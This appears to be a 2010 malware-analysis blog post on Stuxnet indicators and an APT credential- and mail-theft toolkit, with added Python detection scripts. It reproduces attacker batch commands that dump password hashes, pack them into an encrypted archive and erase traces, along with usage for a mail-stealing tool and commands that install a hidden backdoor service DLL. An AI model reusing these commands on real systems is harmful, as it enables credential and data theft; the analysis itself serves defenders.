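     "sha1": "0x152B6830777E7F2B214708A21BA28F9D625E5E16"},
    {"path": r"%Windir%\inf\oem7A.PNF", "size": 498176,
     "sha1": "0xBCFCC25C6D0F58D784D5B5A4C631E920F655F50E"},
    {"path": r"%System%\drivers\mrxcls.sys", "size": 26616,
     "md5": "0xF8153747BAE8B4AE48837EE17172151E",
     "sha1": "0xCB0793029C60C0BD059FF85DE956619F7FDEB4FD"},
    {"path": r"%System%\drivers\mrxnet.sys", "size": 17400,
     "md5": "0xCC1DB5360109DE3B857654297D262CA1",
     "sha1": "0x758240613C362BB1FD13E07D3D19F357B7F8A6DA"},
]

def normalise_hash(value):
    """Strip the report's 0x prefix and lower-case for comparison."""
    return re.sub(r"^0x", "", value.strip(), flags=re.IGNORECASE).lower()

def components(ioc_path, windir):
    """Turn %Windir%\\... or %System%\\... into path components below the root."""
    if ioc_path.startswith("%Windir%\\"):
        return [windir] + ioc_path[len("%Windir%\\"):].split("\\")
    if ioc_path.startswith("%System%\\"):
        return [windir, "system32"] + ioc_path[len("%System%\\"):].split("\\")
    return ioc_path.split("\\")

def locate(root, comps):
    """Resolve components case-insensitively (NTFS images on Linux keep case)."""
    cur = root
    for comp in comps:
        if not os.path.isdir(cur):
            return None
        match = next((e for e in os.listdir(cur) if e.lower() == comp.lower()), None)
        if match is None:
            return None
        cur = os.path.join(cur, match)
    return cur if os.path.isfile(cur) else None

def digests(path):
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return {"md5": md5.hexdigest(), "sha1": sha1.hexdigest()}

def sweep(root, iocs=STUXNET_FILES, windir="WINDOWS"):
    """One finding per indicator: (ioc path, status, resolved path or None).

    Status is 'absent', 'present, hash differs' (still worth a look: the
    file name alone is unusual) or 'confirmed' (every published hash matches).
    """
    findings = []
    for ioc in iocs:
        path = locate(root, components(ioc["path"], windir))
        if path is None:
            findings.append((ioc["path"], "absent", None))
            continue
        actual = digests(path)
        published = {k: normalise_hash(ioc[k]) for k in ("md5", "sha1") if k in ioc}
        matched = all(actual[k] == v for k, v in published.items())
        findings.append((ioc["path"], "confirmed" if matched else "present, hash differs", path))
    return findings

def build_demo_volume():
    """Throwaway directory tree with an empty placeholder mrxcls.sys (constructed)."""
    root = tempfile.mkdtemp(prefix="stuxnet-sweep-")
    drivers = os.path.join(root, "Windows", "System32", "Drivers")
    os.makedirs(drivers)
    os.makedirs(os.path.join(root, "Windows", "inf"))
    open(os.path.join(drivers, "MRXCLS.SYS"), "wb").close()
    return root

if __name__ == "__main__":
    root = build_demo_volume()
    for ioc_path, status, resolved in sweep(root):
        print(f"{status:22s} {ioc_path} {resolved or ''}")
```

On a live host pass the volume root (for example "C:\\") and on a mounted image its mount point; a "present, hash differs" result for mrxcls.sys or mrxnet.sys deserves follow-up even though it is not a confirmed match, because those driver names do not belong to a clean install.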

File 016169ebebf1cec2aad6c7f0d0ee9026 received on 2010.07.16 11:55:58 (UTC)
Result: 25/41 (60.98%)
a-squared     2010.07.16     Trojan-Dropper.Win32.Stuxnet!IK
AhnLab-V3     2010.07.16.00     2010.07.15     Dropper/Win32.Stuxnet
AntiVir     2010.07.16     TR/Drop.Stuxnet.D
Avast     4.8.1351.0     2010.07.16     Win32:Trojan-gen
Avast5     5.0.332.0     2010.07.16     Win32:Trojan-gen
AVG     2010.07.16     SHeur3.XLI
BitDefender     7.2     2010.07.16     Win32.Worm.Stuxnet.A
Comodo     5446     2010.07.16     TrojWare.Win32.Rootkit.Stuxnet.a
DrWeb     2010.07.16     Trojan.Stuxnet.1
F-Secure     9.0.15370.0     2010.07.16     Trojan.Agent.AQCK
GData     21     2010.07.16     Win32.Worm.Stuxnet.A
Ikarus     T3.     2010.07.16     Trojan-Dropper.Win32.Stuxnet
Kaspersky     2010.07.16     Trojan-Dropper.Win32.Stuxnet.d
McAfee     5.400.0.1158     2010.07.16     Stuxnet
McAfee-GW-Edition     2010.1     2010.07.16     Heuristic.LooksLike.Win32.NewMalware.B
Microsoft     1.6004     2010.07.16     TrojanDropper:Win32/Stuxnet.A
NOD32     5283     2010.07.16     Win32/Stuxnet.A
nProtect     2010-07-16.01     2010.07.16     Trojan.Agent.AQCK
PCTools     2010.07.16     Rootkit.Stuxnet
Prevx     3.0     2010.07.16     Medium Risk Malware
Sophos     4.55.0     2010.07.16     Troj/Stuxnet-A
Sunbelt     6591     2010.07.16     Trojan.Win32.Generic!BT
Symantec     20101.1.1.7     2010.07.16     Trojan.Gen
VBA32     2010.07.16     Trojan-Spy.0485
VirusBuster     2010.07.16     Trojan.DR.Stuxnet.C
Additional information
File size: 517632 bytes
MD5   : 74ddc49a7c121a61b8d06c03f92d0c13

Microsoft Malware Protection Center
Aliases: Win32/PcClient.ACH (CA)

Alert Level: Severe
Released: Jul 07, 2010
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.

System changes
The following system changes may indicate the presence of this malware:

      The presence of the following files:
      The presence of the following registry keys:

Technical Information (Analysis)
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.
Trojan:WinNT/Stuxnet.A may be present as the following file:


Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.

The trojan component runs as a hidden service named "MRXCLS" via a registry modification as in the following example:

Sets value: "Description"
With data: "MRXCLS"
Sets value: "DisplayName"
With data: "MRXCLS"
Sets value: "ErrorControl"
With data: "0"
Sets value: "Group"
With data: "Network"
Sets value: "ImagePath"
With data: "\??\%windir%\system32\Drivers\mrxcls.sys"
Sets value: "Start"
With data: "1"
Sets value: "Type"
With data: "1"
Sets value: "Data"
With data: ""
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
Injects code
Trojan:WinNT/Stuxnet.A is capable of injecting malicious code into the running process "LSASS.EXE" based on data written in the registry or from other TrojanDropper:Win32/Stuxnet.A components such as the following:


Analysis by Francis Allan Tan Seng 

Friday, July 16, 2010

APT malware #2. Anatomy of a mail / data theft attack. (wiam.exe and others)

These days I see a spike in the number of searches for WIAM.EXE, which is listed as one of the files available for download upon request. I thought I would add a few more details on this file and the files associated with it.

While there can be any kind of file named wiam.exe, chances are that your file is similar or identical to the one described below. This file is part of the kind of malware frequently referred to as APT malware. If you find this file on a system, look for the others listed below. And yes, as you already guessed, you have a Problem.

According to Mandiant 
"The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers. The intruders responsible for the APT attacks target the Defense Industrial Base (DIB), financial industry, manufacturing industry, and research industry. The attacks used by the APT intruders are not very different from any other intruder. The main differentiator is the APT intruder’s perseverance and resources. They have malicious code (malware) that circumvents common safeguards such as anti-virus and they tend to generate more activity than wanton “drive by hacks” on the Internet. The intruders also escalate their tools and techniques as a victim firm’s capability to respond improves. Therefore, the APT attacks present different challenges than addressing common computer security breaches."
Download all malware files mentioned below as a password protected archive (contact me if you need the password)
Download additional files mentioned in the update July 16, 2010

 Update: scroll down to see recent additions marked  Update July 16, 2010
1. wiam.exe + iam.dll
The file itself is not really a trojan but a CLI tool, part of a modified Pass-The-Hash Toolkit (PSH toolkit) released by Core Technologies.
"The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions maintained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!)" See Modifying Windows NT Logon Credential
PSH original toolkit files
File: iam.exe  Size: 90112 MD5:  1FF020D6F41CBF73ADF3AF2DE9A08CFD
File: iamdll.dll  Size: 49152  MD5:  DAB43935D17725024CC5EF2DD35CBEDD
 File iam.exe received on 2010.06.07 17:06:26 (UTC)
Result: 5/41 (12.2%)
Authentium    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Prot    2010.06.07    W32/Heuristic-KPP!Eldorado
Panda    2010.06.06    Suspicious file
PCTools    2010.06.07    Hacktool.PTHToolkit
Symantec    20101.1.0.89    2010.06.07    Hacktool.PTHToolkit
File size: 90112 bytes
MD5...: 1ff020d6f41cbf73adf3af2de9a08cfd

File iamdll.dll received on 2010.06.07 17:26:26 (UTC)
Result: 0/41 (0%)
Additional information
File size: 49152 bytes
MD5...: dab43935d17725024cc5ef2dd35cbedd

Modified kit
File: wiam.exe  Size: 40960  MD5:  F49CB9A7006FB34E5B5A81AE32358C77
File: iam.dll   Size: 36864  MD5:  30D50F856EFE9BCF7D0A859154CB2F92
 File wiam.exe received on 2010.06.07 17:07:40 (UTC)
Result: 22/41 (53.66%) 
a-squared    2010.06.07    Trojan.Hijacker!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Malware/Win32.Trojan Horse
AntiVir    2010.06.07    TR/Hijacker.Gen
Authentium    2010.06.07    W32/Heuristic-KPP!Eldorado
Avast    4.8.1351.0    2010.06.07    Win32:Trojan-gen
Avast5    5.0.332.0    2010.06.07    Win32:Trojan-gen
BitDefender    7.2    2010.06.07    Application.Generic.248976
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5019    2010.06.07    UnclassifiedMalware
eSafe    2010.06.06    Win32.TRHijacker
F-Prot    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Secure    9.0.15370.0    2010.06.07    Application.Generic.248976
GData    21    2010.06.07    Application.Generic.248976
Ikarus    T3.    2010.06.07    Trojan.Hijacker
McAfee    5.400.0.1158    2010.06.07    Generic.dx!mfu
McAfee-GW-Edition    2010.1    2010.06.07    Generic.dx!mfu
NOD32    5180    2010.06.07    probably a variant of Win32/Agent
Panda    2010.06.06    Trj/CI.A
PCTools    2010.06.07    Trojan.Generic
Sunbelt    6416    2010.06.07    Trojan.Win32.Generic!BT
Symantec    20101.1.0.89    2010.06.07    Trojan Horse
VirusBuster    2010.06.07    Trojan.Hijacker.BUO
Additional information
File size: 40960 bytes
MD5...: f49cb9a7006fb34e5b5a81ae32358c77

File iam.dll received on 2010.06.07 17:22:42 (UTC)
Result: 0/41 (0%)
Additional information
File size: 36864 bytes
MD5...: 30d50f856efe9bcf7d0a859154cb2f92

You can compare them in a hex editor; the files are not identical, but there are similarities in the strings.

iam.exe file from Core

wiam.exe strings (partial, just for comparison)

The files can be found in various subdirectories of

%userprofile%\local settings\temp

If your attackers are sloppy or if you run data recovery/unerase/unformat tools on the affected machine, you may find other tools and files associated with this type of attack.

2. DumpExt.dll, DumpSvc.exe, PWDumpX.exe
PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.
I don't think these files require much analysis; they are part of a well known password stealing application, and its output is what the pass-the-hash exercise described above needs.

3. m.exe

Update: July 16, 2010. 
You may see MAPI.EXE as a variant, which does the same thing (see the download link at the beginning of this post).
VT 0/42 
File size: 227840 bytes
MD5   : c57902ace7ff4173ae41f1292ea85e2a

m.exe is a file you may find together with the files listed. This file might be a standalone creation or a derivative of getmail (many thanks to JM for the tip). See the strings below for comparison.

Once user credentials have been changed using the PSH toolkit described above (wiam.exe + iam.dll), the m.exe CLI tool can be used to retrieve the target's email messages from an Exchange server. The usage is the following:

Example:%s -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

One needs to specify user name, server name, date range and location where to save the stolen data.

The email messages will be converted to text and attachments saved in corresponding subfolders. See examples below.

The message formatting will look like this:

From:Jon Doe
To:Jane Smith
Subject:RE: Meeting
Recv Time:08/05/2009 08:27 PM

Hi Jane,

Thanks so much but I will not be able to attend the meeting. 


From: Jane Smith []
Sent: Tuesday, August 04, 2009 10:43 AM
To: Jon Doe
Subject: Meeting

Jon, can you join us for the meeting tomorrow?

Until very recently it was 0/41 on VT but now it is 1/41
  File m.exe received on 2010.06.07 18:11:03 (UTC)
Result: 1/41 (2.44%)
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Backdoor.H
Additional information
File size: 215552 bytes
MD5...: 09e25bb934d8523fccd27b86fbf4f8ce

m.exe strings

getmail.exe strings

4. r.exe, ntfre.exe, or any other name
The tools get uploaded as an archive (the archive may be disguised as a temp file, such as ~WRD0204.tmp), and the stolen data needs to be compressed before it is taken out, so any kind of archiver can be involved. These are two examples of the same command-line WinRAR, just under different names:
(C) 1993-%d Alexander Roshal
Usage:     rar - -
Usage:     unrar - -

  a             Add files to archive
 File ntfre.exe received on 2010.06.07 18:28:41 (UTC)
Result: 1/41 (2.44%)
eSafe    2010.06.06    Win32.Banker  - not really, but I am sure they use these in banks too (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274
r.exe has the same MD5: c7e858e4a51ba7d26af9235064988274

5. Batch files to automate the process.
There can be any variety of batch files; their content depends on how much typing the attackers want to avoid. Here is an example of a password-hash stealing process, pp.bat, with each command annotated:

cd C:\windows\ime\imejp
ntfre e -p64740629 ~WRD0203.tmp      (extract the ~WRD0203.tmp archive using the password 64740629)
del ~WRD0203.tmp                     (delete the archive)
PWDumpX.exe + +                      (dump the password hashes)
del DumpExt.dll
del DumpSvc.exe
del PWDumpX.exe                      (remove the dumper components)
ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday  C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
                                     (pack the dump output into ~WRD001.tmp, see below)
del ntfre.exe                        (remove the renamed WinRAR)
net use \\\ipc$ /del                 (drop the IPC$ session; the host name is not shown in the sample)
del pp.bat                           (delete the batch file itself)

The archiving command

ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp

means the following (these are standard RAR command-line switches):
a - add files to the archive
-r - recurse subdirectories
-s - create a solid archive
-m3 - compression method 3 (normal, which is the default; 0 is store, 5 is best)
-inul - disable all messages
-ep1 - exclude the base directory from the stored file names
-n*.txt - include only files matching *.txt (presumably the dumper's text output)
-hphappyday - encrypt both file data and headers with the password "happyday" (unlike -p, -hp also hides the file names inside the archive)
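As an added example (not a tool from the original post), here is a small Python triage script for the staging pattern above. It identifies files by content rather than by name, so a RAR archive parked as ~WRD001.tmp or a rar.exe renamed to ntfre.exe is still recognized, and it reads the RAR 4.x main-header flag that records header encryption, which is what -hp sets and -p does not. The sample files at the bottom are constructed inline; the function names are mine.

```python
r"""Content-based triage for the staging pattern above: a renamed command-line
WinRAR plus archives parked under Office-style temp names (~WRD0203.tmp).

Added example, not a tool from the original post. Files are identified by
signature, not by name: RAR 4.x / 5.x markers, the RAR 4.x main-header flag
0x0080 (block headers encrypted, which is what -hp sets), and PE images that
carry WinRAR's own strings. The sample files at the bottom are constructed.
"""
import struct
import zlib

RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
MAIN_HEAD = 0x73               # RAR 4.x block type of the main archive header
MHD_PASSWORD = 0x0080          # main-header flag: headers are encrypted (-hp)
WINRAR_MARKERS = (b"Alexander Roshal", b"Usage:     rar", b"Usage:     unrar")


def classify(data: bytes) -> dict:
    """Say what the bytes really are, regardless of the file name."""
    info = {"kind": "other", "headers_encrypted": False, "winrar_strings": False}
    if data.startswith(RAR5_SIG):
        info["kind"] = "rar5"      # RAR 5 keeps its encryption flag elsewhere
    elif data.startswith(RAR4_SIG):
        info["kind"] = "rar4"
        # Main header follows the 7-byte marker:
        #   HEAD_CRC(2) HEAD_TYPE(1) HEAD_FLAGS(2) HEAD_SIZE(2) ...
        hdr = data[len(RAR4_SIG):len(RAR4_SIG) + 7]
        if len(hdr) == 7:
            _crc, head_type, flags, _size = struct.unpack("<HBHH", hdr)
            if head_type == MAIN_HEAD:
                info["headers_encrypted"] = bool(flags & MHD_PASSWORD)
    elif data.startswith(b"MZ"):
        info["kind"] = "pe"
        info["winrar_strings"] = any(m in data for m in WINRAR_MARKERS)
    return info


def triage(files: dict) -> list:
    """files: {path: bytes}. Returns (path, reason) pairs worth a closer look."""
    findings = []
    for path, data in files.items():
        c = classify(data)
        name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        temp_looking = name.startswith("~") or name.endswith(".tmp")
        if c["kind"].startswith("rar"):
            if c["headers_encrypted"]:
                findings.append((path, "RAR archive with encrypted headers (-hp)"))
            elif temp_looking:
                findings.append((path, "RAR archive disguised as a temp file"))
        elif c["kind"] == "pe" and c["winrar_strings"]:
            findings.append((path, "renamed WinRAR binary"))
    return findings


def rar4_main_header(flags: int) -> bytes:
    """Marker + a well-formed RAR 4.x main header (used only to build samples)."""
    body = struct.pack("<BHH", MAIN_HEAD, flags, 13) + b"\x00" * 2 + b"\x00" * 4
    head_crc = zlib.crc32(body) & 0xFFFF      # low 16 bits of CRC32 over the header
    return RAR4_SIG + struct.pack("<H", head_crc) + body


# Constructed sample "disk": names follow the post, contents are synthetic.
SAMPLE_FILES = {
    r"C:\windows\ime\imejp\~WRD001.tmp": rar4_main_header(MHD_PASSWORD),   # exfil archive
    r"C:\windows\ime\imejp\~WRD0203.tmp": rar4_main_header(0),             # tool drop (-p only)
    r"C:\windows\ime\imejp\ntfre.exe": b"MZ" + b"\x00" * 64 + b"(C) 1993-2010 Alexander Roshal\x00",
    r"C:\windows\ime\imejp\readme.txt": b"nothing to see here",
}

if __name__ == "__main__":
    for path, reason in triage(SAMPLE_FILES):
        print(f"{reason:42} {path}")
```

To run it over a real temp directory, build the dict from os.walk(), reading the first few kilobytes of each file for the signature check and the whole file for the string check. RAR5 archives (2013 and later) store the encryption flag elsewhere, so the script only reports those as archives.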

6. Backdoor services and files for their installation.
There are MANY types of services that get modified to serve as backdoors by replacing the legitimate library. I posted a few recent examples before and will post more, but for now I will give one example.


some strings
cmd /c attrib +h +s qmqrprxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 qmqrprxy.dll,RundllInstall
cmd /c del.bat
del %s
del %s /as
ping -n 3
Update July 16, 2010 
Here is a nice recent example of a backdoor service (the legitimate library file of a non-essential service gets replaced with a malicious file):

"DisplayName"="Authentication Service"
"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"

The legitimate ias.dll is replaced with the malicious library (submitted to VT under the name iass.dll):
File iass.dll received on 2010.07.05 04:11:40 (UTC)
Result: 18/41 (43.90%)
a-squared 2010.07.05 Packer.RLPack!IK
AntiVir 2010.07.04 TR/Crypt.XPACK.Gen
Authentium 2010.07.04 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 2010.07.04 BackDoor.Generic12.BLMD
BitDefender 7.2 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Comodo 5321 2010.07.05 Heur.Pck.RLPack
F-Prot 2010.07.04 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
GData 21 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Ikarus T3. 2010.07.05 Packer.RLPack
McAfee-GW-Edition 2010.1 2010.07.04 Heuristic.LooksLike.Win32.Suspicious.C
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
nProtect 2010-07-04.02 2010.07.04 Gen:Packer.RLPack.D.ai5aaiqnctm
Panda 2010.07.04 Suspicious file
Sophos 4.54.0 2010.07.05 Sus/Encpk-MV
TrendMicro 2010.07.05 PAK_Generic.001
Additional information
File size: 16048 bytes
MD5   : 426f6471b612cf7bb32130fee94cf4c3

Another example is a backdoor file that does not run as a service. It runs as a separate process named ccapp.exe, the name of the Symantec/Norton Antivirus real-time scanner.
ccapp.exe  19/41  FFA85CB60C3572198A520B866FAE8B15
 File ccapp.exe received on 2010.07.05 04:26:40 (UTC)
Result: 19/41 (46.34%)
AhnLab-V3     2010.07.03.00     2010.07.03     Win32/MalPackedB.suspicious
AntiVir     2010.07.04     TR/Crypt.ZPACK.Gen
Authentium     2010.07.04     W32/Fujack.U
Avast     4.8.1351.0     2010.07.04     Win32:Malware-gen
Avast5     5.0.332.0     2010.07.04     Win32:Malware-gen
AVG     2010.07.04     Win32/Virut.Z
BitDefender     7.2     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo     5321     2010.07.05     TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot     2010.07.04     W32/Fujack.U
F-Secure     9.0.15370.0     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData     21     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft     1.5902     2010.07.03     Backdoor:Win32/Pingbed.A
Norman     6.05.10     2010.07.04     Fujack.T
nProtect     2010-07-04.02     2010.07.04     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda     2010.07.04     Suspicious file
Sunbelt     6544     2010.07.05     Trojan.Crypt.AntiSig.b (v)
Symantec     20101.1.0.89     2010.07.05     Suspicious.MH690.A
ViRobot     2010.7.3.3920     2010.07.04     Backdoor.Win32.IRCBot.35288
VirusBuster     2010.07.04     Packed/RLPack
Additional information
File size: 14257 bytes
MD5   : ffa85cb60c3572198a520b866fae8b15
 ------------------------ end of July 16, 2010 update-------------------------

qmqr.dll or qmqrprxy.dll

C:\WINDOWS\system32\qmqrprxy.dll (32768 bytes) - qmqrprxy.dll replaces the legitimate BITS service library qmgr.dll.

Command sequence (from C:\del.bat, 56 bytes):
cmd /c rundll32 qmqrprxy.dll,RundllInstall   - calls the DLL's RundllInstall export
cmd /c net stop bits
cmd /c net start bits                        - restarts BITS so the new library gets loaded
cmd /c attrib +h +s qmqrprxy.dll             - sets the hidden and system attributes
cmd /c del.bat                               - deletes the batch file

BITS firewall bypass / backdoor - see the explanation in "New Attack Piggybacks on Microsoft's Patch Service" or in "Обход фаеров с использованием BITS" (Russian: "Bypassing firewalls using BITS").
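A check a responder would want for the service-library swap described above, added here as an example rather than code from the post: parse a "reg export" of the Services hive and compare each ServiceDll against the library the service is supposed to load. The expected-DLL table holds only the two services this post discusses (BITS -> qmgr.dll, IAS -> ias.dll); extend it with your own baseline. The .reg text below is constructed to show a BITS Parameters key pointing at the dropped qmqrprxy.dll; the function names and the _hex2 helper are mine.

```python
r"""Audit ServiceDll values from a 'reg export' of the Services hive against the
library each service is supposed to load.

Added example, not code from the post. EXPECTED_SERVICE_DLL covers only the
two services discussed here (BITS -> qmgr.dll, IAS -> ias.dll); extend it with
your own baseline. SAMPLE_REG is constructed and shows a BITS Parameters key
pointing at the dropped qmqrprxy.dll. Collect real data on a suspect host with:
    reg export HKLM\SYSTEM\CurrentControlSet\Services services.reg
"""
import re

EXPECTED_SERVICE_DLL = {
    "bits": "qmgr.dll",   # Background Intelligent Transfer Service
    "ias": "ias.dll",     # Internet Authentication Service
}

# Matches the service key itself or its Parameters subkey; group 1 = service name.
KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\\]]+)(?:\\Parameters)?\]$",
    re.IGNORECASE,
)
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<value>.+)$')


def _decode_reg_value(raw: str) -> str:
    """Decode the two forms reg.exe uses for strings: "..." and hex(2):utf-16le."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    m = re.match(r"hex(?:\(2\))?:(.*)$", raw)
    if m:
        data = bytes(int(b, 16) for b in m.group(1).split(",") if b.strip())
        return data.decode("utf-16-le").rstrip("\x00")
    return raw


def parse_reg_export(text: str) -> dict:
    """Return {service_name: {value_name: value}} for keys under the Services hive."""
    services, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip() if pending else raw.rstrip()
        pending = ""
        if line.endswith("\\"):          # reg.exe wraps long hex values with a trailing backslash
            pending = line[:-1]
            continue
        if line.startswith("["):
            km = KEY_RE.match(line)
            current = km.group(1).lower() if km else None
            if current:
                services.setdefault(current, {})
            continue
        vm = VALUE_RE.match(line)
        if vm and current:
            services[current][vm.group("name").lower()] = _decode_reg_value(vm.group("value"))
    return services


def audit_service_dlls(text: str) -> list:
    """(service, ServiceDll) pairs whose library is not the one we expect."""
    findings = []
    for svc, values in parse_reg_export(text).items():
        dll = values.get("servicedll")
        if not dll or svc not in EXPECTED_SERVICE_DLL:
            continue
        base = dll.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base != EXPECTED_SERVICE_DLL[svc]:
            findings.append((svc, dll))
    return findings


def _hex2(s: str) -> str:
    """Encode a string as reg.exe does for REG_EXPAND_SZ: hex(2):, UTF-16LE, wrapped."""
    hx = [f"{b:02x}" for b in (s + "\x00").encode("utf-16-le")]
    rows = [",".join(hx[i:i + 20]) for i in range(0, len(hx), 20)]
    return "hex(2):" + ",\\\n  ".join(rows)


# Constructed .reg export: the BITS ServiceDll has been pointed at the dropped library.
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]",
    '"DisplayName"="Background Intelligent Transfer Service"',
    r'"ImagePath"="%SystemRoot%\\system32\\svchost.exe -k netsvcs"',
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters]",
    '"ServiceDll"=' + _hex2(r"C:\WINDOWS\system32\qmqrprxy.dll"),
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IAS\Parameters]",
    r'"ServiceDll"="%SystemRoot%\\system32\\ias.dll"',
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]",
    r'"ServiceDll"="%SystemRoot%\\System32\\dnsrslvr.dll"',
])

if __name__ == "__main__":
    for svc, dll in audit_service_dlls(SAMPLE_REG):
        print(f"{svc}: ServiceDll = {dll}  <-- not the expected {EXPECTED_SERVICE_DLL[svc]}")
```

reg.exe writes .reg files as UTF-16 with a BOM, so read a real export with open(path, encoding="utf-16") before passing the text in. A matching file name is not proof of a clean service: an attacker can also drop the malicious library under the legitimate name, so confirm that the file on disk has the expected size and a valid Microsoft signature as well.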

TCP traffic
ISP:    ChinaNet Shanghai Province Network
Organization:    ChinaNet Shanghai Province Network
Country:    China
State/Region:    Shanghai
 File qmqrprxy.dll received on 2010.06.07 20:28:13 (UTC)  - originally was 2/41 on VT
Result: 25/41 (60.98%)
a-squared    2010.06.07    Trojan-Downloader.Win32.Small!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Win-Trojan/Atraps.32768.N
AntiVir    2010.06.07    TR/ATRAPS.Gen
Avast    4.8.1351.0    2010.06.07    Win32:Malware-gen
Avast5    5.0.332.0    2010.06.07    Win32:Malware-gen
AVG    2010.06.07    BackDoor.Generic12.KBM
BitDefender    7.2    2010.06.07    Trojan.Generic.2664831
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5020    2010.06.07    TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure    9.0.15370.0    2010.06.07    Trojan.Generic.2664831
GData    21    2010.06.07    Trojan.Generic.2664831
Ikarus    T3.    2010.06.07    Trojan-Downloader.Win32.Small
Kaspersky    2010.06.07    Backdoor.Win32.Small.iog
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Downloader.H
Microsoft    1.5802    2010.06.07    TrojanDownloader:Win32/Troxen!rts
NOD32    5180    2010.06.07    a variant of Win32/Agent.WQS
Norman    6.04.12    2010.06.07    W32/Atraps.EZM
nProtect    2010-06-07.01    2010.06.07    Trojan.Generic.2664831
Panda    2010.06.07    Trj/CI.A
PCTools    2010.06.07    Trojan.ADH
Prevx    3.0    2010.06.07    High Risk Worm
Sunbelt    6416    2010.06.07    Trojan.Win32.Small
Symantec    20101.1.0.89    2010.06.07    Trojan.ADH
TrendMicro    2010.06.07    BKDR_SMALL.LOP
TrendMicro-HouseCall    2010.06.07    BKDR_SMALL.LOP
Additional information
File size: 32768 bytes
MD5...: 03b3cceb253fd782590cf0efafd49d5f

There can be a few other files as well, but this is the basic pack needed to pull it off. I will be adding more files related to this type of attack and other APT malware; feel free to email me if you have questions or comments.